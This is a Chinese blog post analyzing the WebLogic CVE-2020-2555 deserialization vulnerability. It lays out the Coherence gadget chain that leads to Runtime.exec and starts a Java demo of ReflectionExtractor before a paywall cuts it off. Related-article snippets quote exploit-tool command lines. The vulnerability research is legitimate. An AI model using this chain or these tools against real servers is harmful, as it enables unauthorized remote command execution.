weblogic反序列化之CVE-2020-2555漏洞分析

最新推荐文章于 2024-07-15 17:36:21 发布
最新推荐文章于 2024-07-15 17:36:21 发布
阅读量4.6k 收藏 5
点赞数
文章标签: 安全 java 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45682070/article/details/123573102
版权
本文深入探讨了CVE-2020-2555漏洞,该漏洞源于Weblogic中的Coherence组件。利用此漏洞,攻击者可通过T3协议发送恶意序列化数据,触发服务器反序列化执行攻击代码。文章详细分析了ReflectionExtractor、ChainedExtractor和LimitFilter类在利用链中的作用,并提供了POC演示如何构造序列化脚本及利用T3协议进行攻击。
摘要由CSDN通过智能技术生成

前言

CVE-2020-2555主要源于在coherence.jar存在着用于gadget构造的类(反序列化构造类),并且利用weblogic默认存在的T3协议进行传输和解析进而导致weblogic服务器反序列化恶意代码最后执行攻击语句。
Oracle Coherence组件默认集成在Weblogic12c及以上版本中。

利用链

/*
 * gadget:
 *      BadAttributeValueExpException.readObject()
 *          com.tangosol.util.filter.LimitFilter.toString()
 *              com.tangosol.util.extractor.ChainedExtractor.extract()
 *                  com.tangosol.util.extractor.ReflectionExtractor.extract()
 *                      Method.invoke()
 *                      ...
 *                      Runtime.getRuntime.exec()
 */

CVE-2020-2555

ReflectionExtractor

跟着链条走,先看一下ReflectionExtractor#extract方法,传入一个oTarget对象,然后通过ClassHelper.findMethod()反射获指定方法,赋值给this.m_methodPrev,最后在53行调用invoke方法。
在这里插入图片描述
先来一段简单demo来看看ReflectionExtractor的实例化,先看构造方法,师傅们应该在上图看到了,接收三个参数,然后赋值给类属性。这里接收的两个参数,一个传入getMethod,一个传入new Object[]{"getRuntime", new Class[0]}.

在这里插入图片描述
可以发现跟CC链条中的commons collections调用链是一样的。
代码如下:

import com.tangosol.util.extractor.ReflectionExtractor;

public class CVE_2020_2555 {
    public static void main(String[] args) throws Exception {
        ReflectionExtractor reflectionExtractor = new ReflectionExtractor("getMethod", new Object[]{"getRuntime", new Class[0]});
        Object extract = reflectionExtractor.extract(Runtime.class);
        System.ou
最低0.47元/天 解锁文章
XiaoLeiZhaoO
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
weblogic-CVE-2020-2555
m0_51369969的博客
07-14 243
Oracle WebLogic Server 产品中的漏洞(组件:WLS 核心组件)。受影响的受支持版本为 10.3.6.0.0、12.1.3.0.0、12.2.1.3.0 和 12.2.1.4.0。易于利用的漏洞允许未经身份验证的攻击者通过 IIOP 访问网络来破坏 Oracle WebLogic Server。成功攻击此漏洞可导致 Oracle WebLogic Server 被接管。...
weblogic CVE-2020-2555 反序列化RCE 复现
qq_30302577的博客
04-01 3159
文章目录前言0x01 漏洞说明0x02 影响版本0x03 漏洞利用0x04 注意的地方0x05 修复建议0x06 时间线0x07 参考链接 前言 本教程及工具仅供技术学习交流、请勿用于非法行为、否则后果自负 0x01 漏洞说明 2020年3月6日,Oracle Coherence 反序列化远程代码执行漏洞CVE-2020-2555)的细节被公开,Oracle Coherence为Oracle融...
web反序列化漏洞原理/Weblogic IIOP反序列化漏洞CVE-2020-2551) 漏洞分析_新手白客教学
最新发布
程序员六七的博客
07-15 1004
安全客 - 安全资讯平台
weblogic-cve_2020_2555漏洞复现
0day
01-28 1866
weblogic-cve_2020_2555漏洞复现 漏洞概述: 该漏洞2020年1月在网上爆出,属于weblogic反序列化漏洞漏洞原因是Oracle Fusion中间件 Oracle Coherence 存在缺陷,攻击者可利用该漏洞在未经授权下通过构造T3协议请求,获取 Weblogic 服务器权限,执行任意命令。 漏洞复现: Vulfocus平台拉取下载启动漏洞镜像环境: 访问漏洞环境地址端口11317,该端口映射在weblogic的服务端口7001,在url地址栏输入ip端口后添加
CVE-2020-2555:CVE-2020-2555 Python POC
04-15
CVE-2020-2555 python CVE-2020-2555.py ip port test.ser
Weblogic Cohence反序列化RCE(CVE-2020-2555)复现
玄道的网安博客
08-27 554
影响版本 Oracle Coherence 3.7.1.17 Oracle Coherence 12.1.3.0.0 Oracle Coherence 12.2.1.3.0.0 Oracle Coherence 12.2.1.4.0.0 漏洞搭建 以管理员的方式运行安装 java -jar fmw_12.1.3.0.0_wls.jar 安装时选择了“含示例的完整安装”。其他默认即可 Your-IP:7001/console打开页面 漏洞复现 POC地址:https://
WebLogic反序列化_CVE-2017-3248
09-06
WebLogic反序列化_CVE-2017-3248 java -jar weblogic_cmd.jar -C pwd -H 192.168.1.1 -P 7001 工具使用方法: -B Runtime Blind Execute Command maybe you should select os type -C <arg> (执行命令)Execute ...
CVE-2019-2725:WebLogic安全反序列化-CVE-2019-2725有效负载生成器和漏洞利用
04-25
CVE-2019-2725 WebLogic Universal Exploit-CVE-2017-3506 / CVE-2017-10271 / CVE-2019-2725 / CVE-2019-2729有效负载生成器和利用信息/帮助$ python3 weblogic_exploit.py -h====================================...
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)以及安装步骤
11-23
Weblogic反序列化远程代码执行漏洞CVE-2018-2893)是Oracle WebLogic Server中一个严重安全问题,它允许攻击者通过发送恶意构造的序列化对象来执行任意代码,从而获得对服务器的完全控制。这个漏洞存在于WebLogic ...
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)
09-14
Weblogic反序列化远程代码执行漏洞CVE-2018-2893)是Oracle WebLogic Server中一个严重安全问题,它涉及到组件T3协议处理中的对象反序列化过程。该漏洞允许攻击者通过构造恶意的T3请求,远程执行任意代码,从而...
weblogic 序列化漏洞 CVE-2017-10271 版本 12.1.3.0.0
01-23
weblogic 序列化漏洞 CVE-2017-10271 版本 12.1.3.0.0
漫谈-Weblogic-CVE-2020-2555
Ms08067安全实验室
05-01 4710
背景 2020年1月,互联网上爆出了weblogic反序列化远程命令执行漏洞CVE-2020-2555),Oracle Fusion中间件Oracle Coherence存在缺...
CVE2020-2555漏洞分析
weixin_45540609的博客
08-05 2145
一、简介 Oracle Coherence为Oracle融合中间件中的产品,在WebLogic 12c及以上版本中默认集成到WebLogic安装包中,T3是用于在WebLogic服务器和其他类型的Java程序之间传输信息的协议。 weblogic反序列化远程命令执行漏洞CVE-2020-2555),Oracle Fusion中间件Oracle Coherence存在缺陷,攻击者可利用该漏洞再未授权情况下通过构造T3协议请求,获取weblogic服务器权限,执行任意命令。 漏洞影响情况: Oracl
CVE-2020-2555:Oracle Coherence 反序列化RCE复现
爱国小白帽
04-27 2829
CVE-2020-2555:Oracle Coherence 反序列化RCE复现 原创 PingPig [Timeline Sec](javascript:void(0)???? 今天 点击上方蓝色字体关注我们,一起学安全! 本文作者:PingPig(团队正式成员) 本文字数:699 阅读时长:2~3min 声明:请勿用作违法用途,否则后果自负 0x01 简介 Oracle Coherence为Orac...
漏洞通告】Oracle Coherence反序列化远程代码执行漏洞CVE-2020-2555)通告
爱国小白帽
03-07 1917
漏洞通告】Oracle Coherence反序列化远程代码执行漏洞CVE-2020-2555)通告 原创 威胁对抗能力部 [绿盟科技安全情报](javascript:void(0)???? 昨天 通告编号:NS-2020-0014 2020-03-06 TAG: Oracle Coherence、WebLogic、远程代码执行、CVE-2020-2555 危害等级: 高,攻击者利用此...
Weblogic-CVE-2020-2555复现(VirtualBox虚拟机搭建)
weixin_43061533的博客
11-17 986
weblogic-cve_2020_2555复现 安装环境 靶机:一台Windows 2008 R2 服务器 攻击机:Win 10 配置环境 Jdk1.8.0_221 Weblogic 12.2.1.4.0 下载地址https://www.oracle.com/middleware/technologies/weblogic-server-downloads.html 链接:https://pan.baidu.com/s/12Tt4Y7sXoht0RJD03f25bQ 提取码:1234 1.安装 【代码1
漫谈 Weblogic CVE-2020-2555
whatday的专栏
07-09 753
背景 在2020年1月,互联网上爆出了Weblogic反序列化远程命令执行漏洞CVE-2020-2555),Oracle Fusion中间件 Oracle Coherence 存在缺陷,攻击者可利用该漏洞在未经授权下通过构造T3协议请求,获取 Weblogic 服务器权限,执行任意命令,风险较大。 漏洞信息曝光之后,互联网中发布几篇该漏洞相关的分析文章以及利用 POC,但公布的 POC 有部分不足之处,导致漏洞检测效率变低,不足之处主要体现在: 1 目前所有的利用工具都是通过动态编译进行生产 POC
Weblogic IIOP反序列化漏洞CVE-2020-2551) 漏洞分析
whatday的专栏
07-09 5339
0x00 前言 2020年1月15日, Oracle官方发布了CVE-2020-2551的漏洞通告,漏洞等级为高危,CVVS评分为9.8分,漏洞利用难度低。影响范围为10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0。 0x01 漏洞分析 从Oracle 官方的CPU公告中可以看出该漏洞存在于weblogic核心组件,影响的协议为IIOP。其实经过分析发现,该漏洞原理上类似于RMI反序列化漏洞CVE-2017-3241),和之前的T3协议所引发的一系列.
Weblogic IIOP协议反序列化CVE-2020-2551)漏洞复现
Boom!脑洞大爆炸的博客
11-11 2182
Weblogic IIOP协议反序列化CVE-2020-2551)复现
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值